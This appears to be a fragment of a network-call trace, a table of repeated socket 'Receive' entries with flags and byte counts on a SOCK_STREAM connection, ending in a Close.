| Receive | flags = NO_FLAG_SET, size = 112, size_out = 112 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 160, size_out = 160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 416, size_out = 416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 160, size_out = 160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 976 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 464, size_out = 464 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 160, size_out = 160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 160, size_out = 160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 160, size_out = 160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1440, size_out = 1440 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 160, size_out = 160 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 1773 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1875, size_out = 1875 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 5380 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 11036, size_out = 1452 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 9584, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 6680, size_out = 6680 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 2730 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 13686, size_out = 2904 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 10782, size_out = 1588 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 9194, size_out = 9194 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3648, size_out = 3648 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
